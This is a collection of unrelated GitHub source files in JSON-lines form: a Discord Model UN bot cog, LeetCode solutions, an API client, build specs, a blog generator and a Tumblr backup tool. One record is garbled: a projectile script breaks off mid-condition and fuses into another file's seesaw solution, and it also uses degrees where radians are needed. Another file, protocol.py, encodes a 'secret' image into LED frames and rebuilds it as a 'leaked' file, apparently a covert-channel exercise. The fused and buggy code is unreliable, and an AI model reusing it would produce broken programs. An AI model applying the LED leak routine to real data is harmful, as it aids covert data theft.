self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The UnMod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"Unmod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"UnMod is over!\")\r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n @commands.has_role('Chair')\r\n 
@commands.command(pass_context=True,brief='Register a delegate.', description='Requires !register [delegate name] [status].\\n Status can be present (p),present and voting(pv) or absent (a)')\r\n async def register(self,ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n member=args[0].lower()\r\n status= args[1]\r\n dic=self.register[ctx.guild.id]\r\n dic[member]=status\r\n if status=='p':\r\n await ctx.send(member.title()+\" is present!\")\r\n if status=='pv':\r\n await ctx.send(member.title()+\" is present and voting!\")\r\n if status=='a':\r\n await ctx.send(member.title()+\" is absent!\")\r\n elif status not in ['p','pv','a']:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not a valid registration status. Use p, pv or a.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='View the register.', description='Displays all registered delegations and their statuses.')\r\n async def viewRegister(self,ctx):\r\n if self.session[ctx.guild.id]==True:\r\n dic=self.register[ctx.guild.id]\r\n embedVar = discord.Embed(title=\"Register\", description=\"All registered delegates.\", color=discord.Color.from_rgb(78,134,219))\r\n for k,v in dic.items():\r\n t=''\r\n if v=='p':\r\n t='Present'\r\n if v=='pv':\r\n t='Present and Voting'\r\n if v=='a':\r\n t='Absent'\r\n embedVar.add_field(name=k, value=t, inline=False)\r\n\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Start a vote.', description='Starts a non-caucus vote. Useful for final vote or amendments.\\n Requires !voting [topic]')\r\n async def voting(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n topic=' '.join(word for word in args)\r\n embedVar = discord.Embed(title=\"Voting\", description=\"A vote is in progress.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n \r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Give Chair role.', description='Gives chair role to another member.\\n Requires !chair [@member]')\r\n async def chair(self, ctx,user: discord.Member):\r\n \r\n member = user\r\n role = get(ctx.message.guild.roles, name=\"Chair\")\r\n await member.add_roles(role)\r\n embedVar = discord.Embed(title=\"Chair Role\", description=\"Role was given to \"+str(member), color=discord.Color.from_rgb(78,134,219))\r\n \r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n\r\n \r\n \r\ndef setup(bot):\r\n bot.add_cog(Chair(bot))\r\n","repo_name":"aditepic10/MUNchkinDiscordBot","sub_path":"cogs/Chair.py","file_name":"Chair.py","file_ext":"py","file_size_in_byte":16476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
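The Chair cog above targets the pre-2.0 discord.py extension API (synchronous setup(bot), bot.add_cog, youtube_dl playback). A minimal launcher sketch under those assumptions: discord.py 1.x, the file living at cogs/Chair.py, and a placeholder token; the companion Delegate cog is optional, since the code guards against bot.get_cog('Delegate') returning None.

from discord.ext import commands

bot = commands.Bot(command_prefix='!')
bot.load_extension('cogs.Chair')  # runs the cog's setup(bot) hook
bot.run('YOUR_BOT_TOKEN')  # placeholder token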
+{"seq_id":"18206609032","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n ans = 0\n zeros = 0\n\n l = 0\n for r, num in enumerate(nums):\n if num == 0:\n zeros += 1\n while zeros == 2:\n if nums[l] == 0:\n zeros -= 1\n l += 1\n ans = max(ans, r - l + 1)\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0487. Max Consecutive Ones II/0487.py","file_name":"0487.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
+{"seq_id":"37312293595","text":"import requests\n\nTOKEN = None\n\n\ndef api_init(token):\n global TOKEN\n TOKEN = token\n\n\ndef api_url(path):\n return f'https://sisu.unit4.io/api{path}'\n\n\ndef request_headers(custom_headers):\n return {\n **custom_headers,\n 'Authorization': 'Bearer %s' % TOKEN,\n }\n\n\n# def request_post(url, data):\n# body = json.dumps(data).encode('utf-8')\n# headers = request_headers({\n# 'Content-Type': 'application/json',\n# })\n# req = urllib2.Request(url, headers=headers, data=body)\n# return request_send(req)\n\n\ndef request_put(url, data):\n print(f'> Req {url}')\n headers = request_headers({\n 'Content-Type': 'application/json',\n })\n\n try:\n res = requests.put(url, json=data, headers=headers)\n print(res.status_code)\n\n return res.json()\n except Exception as e:\n print(e)\n\n return None\n\n\n# def request_get(url):\n# headers = request_headers({})\n# req = urllib2.Request(url, headers=headers)\n# return request_send(req)\n\n\ndef api_set_project_file_tests(project_id, file_id, tests):\n url = api_url(f'/projects/{project_id}/file/{file_id}/tests')\n return request_put(url, tests)\n\n\ndef api_project_update_file(project_id, filename, log_list):\n log = '\\n'.join(log_list)\n data = {\n 'filename': filename,\n 'log': log,\n 'lastScanTs': 1,\n 'previewImageUrl': '',\n }\n\n res = request_put(api_url('/projects/%s/file' % project_id), data)\n\n print(filename)\n print(res)\n print(log)\n\n\ndef api_get_file_metadata(file_id):\n url = api_url(f'/data/files/{file_id}/metadata?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.json()\n except Exception as e:\n print(e)\n return None\n\n\ndef api_get_file_content(file_id):\n url = api_url(f'/data/files/{file_id}/content?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.content\n except Exception as e:\n print(e)\n return None\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"42915421115","text":"import math\nangulo=int(input('angulo: '))\nv=int(input('velocidade: '))\nd=(v**2)*math.sin(math.degrees(2*angulo))/9.8\nif 98<=d<100 and 1001:\n answer += math.comb(same[s], 2)\n \n return answer","repo_name":"KB-team3/AlgoGGang","sub_path":"길민지/Week_16/P152996_시소짝꿍.py","file_name":"P152996_시소짝꿍.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"69840086134","text":"from functools import partial\r\n\r\ndef MakeFunc(func, callback):\r\n def Run(func, callback):\r\n callback(func())\r\n return partial(Run, func, callback)\r\n\r\nasync def AsyncRunAll(loop, funcs):\r\n futures = []\r\n for fn in funcs:\r\n futures.append(loop.run_in_executor(None, fn)) \r\n for f in futures:\r\n await f\r\n return","repo_name":"dk1027/PythonQuestradeBalanceChecker","sub_path":"FuncUtils.py","file_name":"FuncUtils.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17614394691","text":"import textwrap\nfrom bitstring import BitArray\n\nNUM_OF_LEDS = 8\nFRAMES_PER_SECOND = 5\nLEN_OF_MSG_LENGTH = 6\n\nRARE_ASCII = \"00011110\"\nNEW_RARE = \"00011111\"\n\ndef _get_start_protocol(content, num_of_leds):\n start_segments = ['1' * num_of_leds]\n length = [str(format(len(content), \"08b\"))]\n return start_segments + length\n\n\ndef _identify_start(byte_stream, num_of_leds):\n for i, byte in enumerate(byte_stream):\n if byte == \"1\" * num_of_leds:\n break\n return byte_stream[i + 1:]\n\n\ndef _split_bytes(bytes_to_split, segment_length):\n return textwrap.wrap(bytes_to_split, segment_length)\n\n\ndef _read_file(file_path):\n stream = b''\n with open(file_path, 'rb') as binary_file:\n for line in binary_file.readlines():\n stream += line\n return BitArray(stream).bin\n\n\ndef _get_msg_length(byte_stream):\n raw_length = byte_stream[0]\n length = int(raw_length, 2)\n msg = byte_stream[0:length]\n return length, msg\n\n\ndef bmp_to_raw(file_path, num_of_leds):\n with open(file_path, \"rb\") as file:\n stream = file.read()\n content = textwrap.wrap(BitArray(stream).bin, num_of_leds)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return finished_data + content\n\n\ndef raw_to_bmp(byte_stream):\n hexed_data = [bytes([byte]) for byte in byte_stream]\n with open(\"leaked_img.bmp\", 'wb') as file:\n for h in hexed_data:\n file.write(h)\n\n\ndef change_to_thirty(stream):\n new_stream = []\n for byte in stream:\n if byte == RARE_ASCII:\n new_stream.append(NEW_RARE)\n else:\n new_stream.append(byte)\n return new_stream\n\n\ndef replace_repeats(stream):\n new_stream = []\n new_stream.append(stream[0])\n for i in range(1, len(stream)):\n if stream[i] == new_stream[i - 1]:\n new_stream.append(RARE_ASCII)\n else:\n new_stream.append(stream[i])\n return new_stream\n\n\ndef data_to_raw(file_path, num_of_leds):\n content = _split_bytes(_read_file(file_path), NUM_OF_LEDS)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return start + finished_data\n\n\ndef raw_to_data(byte_stream):\n decoded_msg = [chr(byte) for byte in byte_stream]\n return \"\".join(decoded_msg)\n\n\na = bmp_to_raw(r\"C:\\Users\\t8875881\\Desktop\\usb\\secret_img.bmp\", 8)","repo_name":"Savioor/sprint2","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15705592383","text":"# Day 21 - Problem 24\r\n\r\n# Challenge\r\n# Write a Python class to convert a roman numeral to an integer.\r\n\r\n# Example\r\n\"\"\"\r\nSample input\r\n'MMMCMLXXXVI'\r\n'MMMM'\r\n'C'\r\n\r\nSample output\r\n3986\r\n4000\r\n100\r\n\"\"\"\r\n\r\n\r\nclass Conversion:\r\n \"\"\"\r\n Class to handle the conversion of numbers across different numeral system.\r\n \"\"\"\r\n def convert_roman_to_int(self, input):\r\n roman_values = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\r\n result = 0\r\n for i in range(len(input)):\r\n if (i > 0) and (roman_values[input[i]] > roman_values[input[i - 1]]):\r\n result += roman_values[input[i]] - 2 * roman_values[input[i - 1]]\r\n else:\r\n result += roman_values[input[i]]\r\n return result\r\n\r\n\r\nconversion = Conversion()\r\nprint(conversion.convert_roman_to_int('MMMCMLXXXVI'))\r\nprint(conversion.convert_roman_to_int('MMMM'))\r\nprint(conversion.convert_roman_to_int('C'))\r\n","repo_name":"jeffreytjs/100DayOfCode","sub_path":"class/convert_to_int.py","file_name":"convert_to_int.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"20451876714","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\na = Analysis(['src\\\\git-watch.py'],\n pathex=['C:\\\\Users\\\\jacob\\\\git\\\\git-watch'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\na.datas += [ ('src/assets/icon.ico', '.\\\\src\\\\assets\\\\icon.ico', 'DATA') ]\n\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='git-watch',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False)\n\nimport shutil\nshutil.copyfile('config.cfg', '{0}/config.cfg'.format(DISTPATH))\n\n","repo_name":"jbmadsen/git-watch","sub_path":"git-watch-build.spec","file_name":"git-watch-build.spec","file_ext":"spec","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7934410949","text":"import funcx_web_service\n\nTEST_CONFIG = \"\"\"\\\nFOO = \"bar\"\nSECRET_VALUE = \"blah\"\nBOOL_VALUE = False\nCONTAINER_SERVICE_ENABLED = False\n\"\"\"\n\n\ndef test_read_from_config(tmp_path, monkeypatch):\n conf_file = tmp_path / \"test.config\"\n conf_file.write_text(TEST_CONFIG)\n monkeypatch.setenv(\"APP_CONFIG_FILE\", str(conf_file))\n\n app = funcx_web_service.create_app()\n assert app.config[\"FOO\"] == \"bar\"\n assert app.config[\"SECRET_VALUE\"] == \"blah\"\n assert not app.config[\"BOOL_VALUE\"]\n\n monkeypatch.setenv(\"SECRET_VALUE\", \"shhh\")\n monkeypatch.setenv(\"BOOL_VALUE\", \"true\")\n app_from_env = funcx_web_service.create_app()\n assert app_from_env.config[\"SECRET_VALUE\"] == \"shhh\"\n assert app_from_env.config[\"BOOL_VALUE\"]\n","repo_name":"funcx-faas/funcx-web-service","sub_path":"tests/unit/test_app_init.py","file_name":"test_app_init.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"}
+{"seq_id":"33174465830","text":"import frappe,json\nfrom frappe.model.document import Document\n#from frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\nclass DealFinalize(Document):\n\tdef before_save(self):\n\t\tif self.saved:\n\t\t\tinitial_item={}\n\t\t\ti_item=[]\n\t\t\tfor row in self.deal_initiate:\n\t\t\t\ti_item.append(row.item_code)\n\t\t\t\tinitial_item[row.item_code]=row.qty\n\t\t\tfinal_item={}\n\t\t\tf_item=[]\n\t\t\tfor row in self.items:\n\t\t\t\t#row.amount=(row.qty*row.rate)\n\t\t\t\t#row.rate=row.rate/self.conversion_rate\n\t\t\t\tf_item.append(row.item_code)\n\t\t\t\tif row.item_code not in final_item:\n\t\t\t\t\t#frappe.throw(\"Item missing in table Deal Finalize \" f'{row.item_code}')\n\t\t\t\t\tfinal_item[row.item_code]=[float(row.qty)]\n\t\t\t\telse:\n\t\t\t\t\tfinal_item[row.item_code].append(float(row.qty))\n\t\t\tif not f_item:\n\t\t\t\tfrappe.throw(\"Deal Finalize Table is Empty\")\n\t\t\tr_m_item=\"\"\n\t\t\tfor row in initial_item:\n\t\t\t\tif row not in final_item:\n\t\t\t\t\tr_item=float(initial_item[row])\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item} ')\n\t\t\t\t#if not row in final_item:\n\t\t\t\t#\tr_m_item+=(f'For Item \"{row}\" : Remaining Quantity - {initial_item[row]} Needs to be Filled')\n\t\t\t\telif row in final_item and float(initial_item[row])!=float(sum(final_item[row])):\n\t\t\t\t\tfrappe.errprint(i_item)\n\t\t\t\t\tfrappe.errprint(f_item)\n\t\t\t\t\tr_item=float(initial_item[row])-float(sum(final_item[row]))\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item} ')\n\t\t\tif r_m_item:\n\t\t\t\tfrappe.throw(\"Total value is not matching,
\" f'{r_m_item}')\n\t\telse:\n\t\t\tself.saved=1\n\tdef before_submit(self):\n\t\tself.before_save()\n\n@frappe.whitelist()\ndef get_rate(item,dn):\n\trate=frappe.db.get_value(\"Deal Initiate Item\",{\"parent\":dn,\"item_code\":item},\"rate\")\n\t#frappe.errprint(rate)\n\treturn rate\n\n\n\n@frappe.whitelist()\ndef make_indent(val,supplier,date,currency,price_list,name):\n\tval=json.loads(val)\n#\tfrappe.errprint(val)\n\tif not val:\n\t\tfrappe.throw(\"No rows selected\")\n\tp_details={}\n\t#frappe.errprint(val)\n\t#for row in val:\n\t#\tif row[\"payment_terms\"] == \"LC @ Sight\":\n\t#\t\trow[\"payment_terms\"]=\"LC\"\n\t#frappe.errprint(val)\n\tfor row in val:\n\t\tif row[\"payment_terms\"] not in p_details:\n\t\t\tp_details[row['payment_terms']]=[row[\"buyer\"]]\n\t\telif row['buyer'] not in p_details[row['payment_terms']]:\n\t\t\tp_details[row['payment_terms']].append(row[\"buyer\"])\n\t\t\t#p_term=row['payment_terms']\n\t\t\t#frappe.throw(\"Buyer not matching for \"f'{p_term}')\n\t#frappe.errprint(p_details)\n\tr_m_buyer=\"\"\n\tfor row in p_details:\n\t\tif(len(set(p_details[row]))>1):\n\t\t\tr_m_buyer+=(f'{row} ')\n\tif r_m_buyer:\n\t\tfrappe.throw(\"Buyer's not matching for Payment Terms
', 'html.parser')\n tags.insert(i, soup)\n\n card = ARTICLE_CARD.format(title=article.title, tags=tags.prettify(),\n date=article.date.strftime('%Y-%m-%d'), readable_date=article.date.strftime('%B %d, %Y'),\n summary=article.summary.prettify(), article_link=article.path)\n return BeautifulSoup(card, 'html.parser')\n\n\ndef build_cards(articles):\n built = BeautifulSoup('<div class=\"container\"></div>', 'html.parser')\n container = built.contents[0]\n\n for i, article in enumerate(articles):\n container.insert(i, build_card(article))\n\n return built\n\n\ndef write(html, title, file_path):\n with open(f'{TEMPLATES_DIR}/head.html', 'r') as f:\n head = f.read()\n\n with open(f'{TEMPLATES_DIR}/tail.html', 'r') as f:\n tail = f.read()\n\n full_html = BeautifulSoup(head + html + tail, 'html.parser')\n title_html = full_html.find('title')\n title_html.clear()\n title_html.insert(0, title)\n with open(file_path, 'w') as f:\n f.write(full_html.prettify())\n\n\ndef build_tag_page(tag, articles):\n cards = build_cards(articles)\n heading = f'Tag: {tag}'\n\n container = cards.find('div', attrs={'class': 'container'})\n tag_heading = BeautifulSoup(f'<h1>{heading}</h1>', 'html.parser')\n container.insert(0, tag_heading)\n\n write(cards.prettify(), f\"{heading} | Layog's blog\",\n f'{SRC_DIR}/tag/{tag.lower()}.html')\n\n\ndef build_tags_pages(articles):\n all_tags = {}\n for article in articles:\n for tag in article.tags:\n all_tags.setdefault(tag.lower(), ([], []))\n all_tags[tag.lower()][0].append(tag)\n all_tags[tag.lower()][1].append(article)\n\n for tag, (representations, articles) in all_tags.items():\n if len(set(representations)) > 1:\n print(\"WARNING: There are multiple representations for tag {}: {}\".format(tag, \", \".join(representations)))\n\n build_tag_page(representations[0], articles)\n\n lower_tags = list(all_tags.keys())\n lower_tags.sort(key=lambda x: (len(all_tags[x][1]), x))\n\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(lower_tags):\n rep = all_tags[tag][0][0]\n count = len(all_tags[tag][1])\n soup = BeautifulSoup(f'
', ''])\n with open_text(tag_index_dir, dir_index) as f:\n f.write(u'\\n'.join(tag_index))\n\n\nclass TumblrBackup(object):\n def __init__(self):\n self.failed_blogs = []\n self.total_count = 0\n self.post_count = 0\n self.filter_skipped = 0\n self.title = None # type: Optional[Text]\n self.subtitle = None # type: Optional[str]\n\n def exit_code(self):\n if self.failed_blogs:\n return EXIT_ERRORS\n if self.total_count == 0:\n return EXIT_NOPOSTS\n return EXIT_SUCCESS\n\n def header(self, title='', body_class='', subtitle='', avatar=False):\n root_rel = {\n 'index': '', 'tag-index': '..', 'tag-archive': '../..'\n }.get(body_class, save_dir)\n css_rel = urlpathjoin(root_rel, custom_css if have_custom_css else backup_css)\n if body_class:\n body_class = ' class=' + body_class\n h = u'''<!DOCTYPE html>\n\n<meta charset=%s>\n<title>%s</title>\n<link rel=stylesheet type=text/css href=%s>\n\n<body%s>\n\n<header>\n''' % (FILE_ENCODING, self.title, css_rel, body_class)\n if avatar:\n f = glob(path_to(theme_dir, avatar_base + '.*'))\n if f:\n h += '<img src={} alt=avatar>\\n'.format(urlpathjoin(root_rel, theme_dir, split(f[0])[1]))\n if title:\n h += u'<h1>%s</h1>\\n' % title\n if subtitle:\n h += u'<p class=subtitle>%s</p>\\n' % subtitle\n h += '</header>\\n'\n return h\n\n @staticmethod\n def footer(base, previous_page, next_page):\n f = '<footer><nav>'\n f += '<a href={} rel=index>Index</a>\\n'.format(urlpathjoin(save_dir, dir_index))\n if previous_page:\n f += '| <a href={} rel=prev>Previous</a>\\n'.format(urlpathjoin(base, previous_page))\n if next_page:\n f += '| <a href={} rel=next>Next</a>\\n'.format(urlpathjoin(base, next_page))\n f += '</nav></footer>\\n'\n return f\n\n @staticmethod\n def get_post_timestamps(posts):\n for post in posts:\n with io.open(post, encoding=FILE_ENCODING) as pf:\n soup = BeautifulSoup(pf, 'lxml')\n postdate = soup.find('time')['datetime']\n del soup\n # No datetime.fromisoformat or datetime.timestamp on Python 2\n yield (datetime.strptime(postdate, '%Y-%m-%dT%H:%M:%SZ') - datetime(1970, 1, 1)) // timedelta(seconds=1)\n\n def backup(self, account, prev_archive):\n \"\"\"makes single files and an index for every post on a public Tumblr blog account\"\"\"\n\n base = get_api_url(account)\n\n # make sure there are folders to save in\n global save_folder, media_folder, post_ext, post_dir, save_dir, have_custom_css\n if options.blosxom:\n save_folder = root_folder\n post_ext = '.txt'\n post_dir = os.curdir\n post_class = BlosxomPost # type: Type[TumblrPost]\n else:\n save_folder = join(root_folder, options.outdir or account)\n media_folder = path_to(media_dir)\n if options.dirs:\n post_ext = ''\n save_dir = '../..'\n mkdir(path_to(post_dir), recursive=True)\n else:\n mkdir(save_folder, recursive=True)\n post_class = TumblrPost\n have_custom_css = os.access(path_to(custom_css), os.R_OK)\n\n self.post_count = 0\n self.filter_skipped = 0\n\n # get the highest post id already saved\n ident_max = None\n if options.incremental:\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n post_glob = glob(path_to(post_dir, filter_))\n if not post_glob:\n pass # No posts to read\n elif options.likes:\n # Read every post to find the newest timestamp we've saved.\n if BeautifulSoup is None:\n raise RuntimeError(\"Incremental likes backup: module 'bs4' is not installed\")\n logger.warn('Finding newest liked post (may take a while)\\n', account=True)\n ident_max = max(self.get_post_timestamps(post_glob))\n else:\n ident_max = max(long(splitext(split(f)[1])[0]) for f in post_glob)\n if ident_max is not None:\n logger.info('Backing up posts after {}\\n'.format(ident_max), account=True)\n\n logger.status('Getting basic information\\r')\n\n api_parser = ApiParser(base, account)\n if prev_archive:\n api_parser.read_archive(prev_archive)\n resp = api_parser.apiparse(1)\n if not resp:\n self.failed_blogs.append(account)\n return\n\n # collect all the meta information\n if options.likes:\n if not resp.get('blog', {}).get('share_likes', True):\n logger.error('{} does not have public likes\\n'.format(account))\n self.failed_blogs.append(account)\n return\n posts_key = 'liked_posts'\n blog = {}\n count_estimate = resp['liked_count']\n else:\n posts_key = 'posts'\n blog = resp.get('blog', {})\n count_estimate = blog.get('posts')\n self.title = escape(blog.get('title', account))\n self.subtitle = blog.get('description', '')\n\n # use the meta information to create a HTML header\n TumblrPost.post_header = self.header(body_class='post')\n\n # start the thread pool\n backup_pool = ThreadPool()\n\n oldest_date = None\n\n # returns whether any posts from this batch were saved\n def _backup(posts, post_respfiles):\n def sort_key(x): return x[0]['liked_timestamp'] if options.likes else long(x[0]['id'])\n sorted_posts = sorted(zip(posts, post_respfiles), key=sort_key, reverse=True)\n for p, prf in sorted_posts:\n no_internet.check()\n post = post_class(p, account, prf, prev_archive)\n oldest_date = post.date\n if ident_max is None:\n pass # No limit\n elif (p['liked_timestamp'] if options.likes else long(post.ident)) <= 
ident_max:\n logger.info('Stopping backup: Incremental backup complete\\n', account=True)\n return False, oldest_date\n if options.period:\n if post.date > options.p_stop:\n raise RuntimeError('Found post with date ({}) newer than before param ({})'.format(\n post.date, options.p_stop))\n if post.date < options.p_start:\n logger.info('Stopping backup: Reached end of period\\n', account=True)\n return False, oldest_date\n if options.request:\n if post.typ not in options.request:\n continue\n tags = options.request[post.typ]\n if not (TAG_ANY in tags or tags & post.tags_lower):\n continue\n if options.no_reblog:\n if 'reblogged_from_name' in p or 'reblogged_root_name' in p:\n if 'trail' in p and not p['trail']:\n continue\n if 'trail' in p and 'is_current_item' not in p['trail'][-1]:\n continue\n elif 'trail' in p and p['trail'] and 'is_current_item' not in p['trail'][-1]:\n continue\n if os.path.exists(path_to(*post.get_path())) and options.no_post_clobber:\n continue # Post exists and no-clobber enabled\n if options.filter and not options.filter.input(p).first():\n self.filter_skipped += 1\n continue\n\n while True:\n try:\n backup_pool.add_work(post.save_content, timeout=0.1)\n break\n except queue.Full:\n pass\n no_internet.check()\n\n self.post_count += 1\n if options.count and self.post_count >= options.count:\n logger.info('Stopping backup: Reached limit of {} posts\\n'.format(options.count), account=True)\n return False, oldest_date\n return True, oldest_date\n\n try:\n # Get the JSON entries from the API, which we can only do for MAX_POSTS posts at once.\n # Posts \"arrive\" in reverse chronological order. Post #0 is the most recent one.\n i = options.skip\n before = options.p_stop if options.period else None\n while True:\n # find the upper bound\n logger.status('Getting {}posts {} to {}{}\\r'.format(\n 'liked ' if options.likes else '', i, i + MAX_POSTS - 1,\n '' if count_estimate is None else ' (of {} expected)'.format(count_estimate),\n ))\n\n resp = api_parser.apiparse(MAX_POSTS, i, before)\n if resp is None:\n self.failed_blogs.append(account)\n break\n\n posts = resp[posts_key]\n if not posts:\n logger.info('Backup complete: Found empty set of posts\\n', account=True)\n break\n\n post_respfiles = resp.get('post_respfiles')\n if post_respfiles is None:\n post_respfiles = [None for _ in posts]\n res, oldest_date = _backup(posts, post_respfiles)\n if not res:\n break\n\n if options.likes:\n next_ = resp['_links'].get('next')\n if next_ is None:\n logger.info('Backup complete: Found end of likes\\n', account=True)\n break\n before = int(next_['query_params']['before'])\n elif before is not None:\n assert oldest_date <= before\n if oldest_date == before:\n oldest_date -= 1\n before = oldest_date\n i += MAX_POSTS\n except:\n # ensure proper thread pool termination\n backup_pool.cancel()\n raise\n\n # wait until all posts have been saved\n backup_pool.wait()\n\n # postprocessing\n if not options.blosxom and (self.post_count or options.count == 0):\n logger.status('Getting avatar and style\\r')\n get_avatar(prev_archive)\n get_style(prev_archive)\n if not have_custom_css:\n save_style()\n logger.status('Building index\\r')\n ix = Indices(self)\n ix.build_index()\n ix.save_index()\n\n logger.status(None)\n skipped_msg = (', {} did not match filter'.format(self.filter_skipped)) if self.filter_skipped else ''\n logger.warn(\n '{} {}posts backed up{}\\n'.format(self.post_count, 'liked ' if options.likes else '', skipped_msg),\n account=True,\n )\n self.total_count += 
self.post_count\n\n\nclass TumblrPost(object):\n post_header = '' # set by TumblrBackup.backup()\n\n def __init__(self, post, backup_account, respfile, prev_archive):\n # type: (JSONDict, str, Text, Text) -> None\n self.content = ''\n self.post = post\n self.backup_account = backup_account\n self.respfile = respfile\n self.prev_archive = prev_archive\n self.creator = post.get('blog_name') or post['tumblelog']\n self.ident = str(post['id'])\n self.url = post['post_url']\n self.shorturl = post['short_url']\n self.typ = str(post['type'])\n self.date = post['liked_timestamp' if options.likes else 'timestamp'] # type: float\n self.isodate = datetime.utcfromtimestamp(self.date).isoformat() + 'Z'\n self.tm = time.localtime(self.date)\n self.title = u''\n self.tags = post['tags']\n self.note_count = post.get('note_count')\n if self.note_count is None:\n self.note_count = post.get('notes', {}).get('count')\n if self.note_count is None:\n self.note_count = 0\n self.reblogged_from = post.get('reblogged_from_url')\n self.reblogged_root = post.get('reblogged_root_url')\n self.source_title = post.get('source_title', '')\n self.source_url = post.get('source_url', '')\n self.tags_lower = None # type: Optional[Set[str]]\n if options.request:\n self.tags_lower = {t.lower() for t in self.tags}\n self.file_name = join(self.ident, dir_index) if options.dirs else self.ident + post_ext\n self.llink = self.ident if options.dirs else self.file_name\n self.media_dir = join(post_dir, self.ident) if options.dirs else media_dir\n self.media_url = urlpathjoin(save_dir, self.media_dir)\n self.media_folder = path_to(self.media_dir)\n\n def save_content(self):\n \"\"\"generates the content for this post\"\"\"\n post = self.post\n content = []\n\n def append(s, fmt=u'%s'):\n content.append(fmt % s)\n\n def get_try(elt):\n return post.get(elt, '')\n\n def append_try(elt, fmt=u'%s'):\n elt = get_try(elt)\n if elt:\n if options.save_images:\n elt = re.sub(r'''(?i)(<img\s(?:[^>]*\s)?src\s*=\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_image, elt\n )\n if options.save_video or options.save_video_tumblr:\n # Handle video element poster attribute\n elt = re.sub(r'''(?i)(', post[footer_pos:])\n parts = post_file.split(os.sep)\n if parts[-1] == dir_index: # .../<post_id>/index.html\n self.file_name = join(*parts[-2:])\n self.ident = parts[-2]\n else:\n self.file_name = parts[-1]\n self.ident = splitext(self.file_name)[0]\n self.date = os.stat(post_file).st_mtime # type: float\n self.tm = time.localtime(self.date)\n\n def get_post(self, in_tag_index):\n with io.open(self.post_file, encoding=FILE_ENCODING) as f:\n post = f.read()\n # remove header and footer\n lines = post.split('\\n')\n while lines and '<article' not in 